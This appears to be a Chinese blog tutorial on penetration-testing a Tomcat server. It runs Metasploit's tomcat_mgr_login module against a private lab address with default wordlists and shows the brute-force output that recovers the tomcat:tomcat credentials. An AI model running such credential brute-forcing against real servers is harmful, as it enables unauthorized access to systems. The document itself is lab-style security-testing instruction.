zoukankan      html  css  js  c++  java

  • 安全测试18渗透攻击Tomcat服务

    1、打开msfconsole控制台

    msfconsole

     2、搜索有效的Tomcat模块

    msf > search tomcat

     这里我们选择使用模块auxiliary/scanner/http/tomcat_mgr_login 

    3.使用Tomcat管理登录模块进行渗透攻击,执行命令如下:

    msf6 > use auxiliary/scanner/http/tomcat_mgr_login

     4,查看tomcat_mgr_login模块有效选项,执行命令

    msf auxiliary(scanner/http/tomcat_mgr_login) > show options

    5.指定用户名和密码文件,这里使用默认路径

    msf6 auxiliary(scanner/http/tomcat_mgr_login) > set user_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
user_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
pass_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
msf6 auxiliary(scanner/http/tomcat_mgr_login) >

    6.指定要攻击的目标服务器

    msf auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.52.132

    7.设置服务器端口号为8180

    msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
rport => 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) >

    8,运行渗透程序

    msf auxiliary(scanner/http/tomcat_mgr_login) > exploit 

[!] No active DB -- Credential data will not be saved!
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.52.132:8180 - Login Successful: tomcat:tomcat
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

     从结果中可以看到找到的账号密码为tomcat,tomcat

    更多技术请关注微信公众号:程序员技术前沿
  • 相关阅读:
    中国科学院2021年硕转博考试分析试题参考解答
    蒲和平大学生数学竞赛教程答案5.1.3
    清华大学2021年数学推荐免试试题参考解答
    蒲和平大学生数学竞赛教程答案4.1.1
    兰州大学历年数学分析高等代数考研试题答案
    复旦大学2021年数学英才实验班选拔考试试题参考解答pdf
    北京大学2021年基础学科招生考试数学试题
    南开大学2021年数学伯苓班/复旦大学2021年数学英才实验班选拔考试试题
    实变函数与泛函分析第05次课:至1.5.2(请点阅读全文进课堂)
    中国科学技术大学2021年新生入学考试试题
  • 原文地址:https://www.cnblogs.com/tiechui2015/p/15715073.html
Copyright © 2011-2022 走看看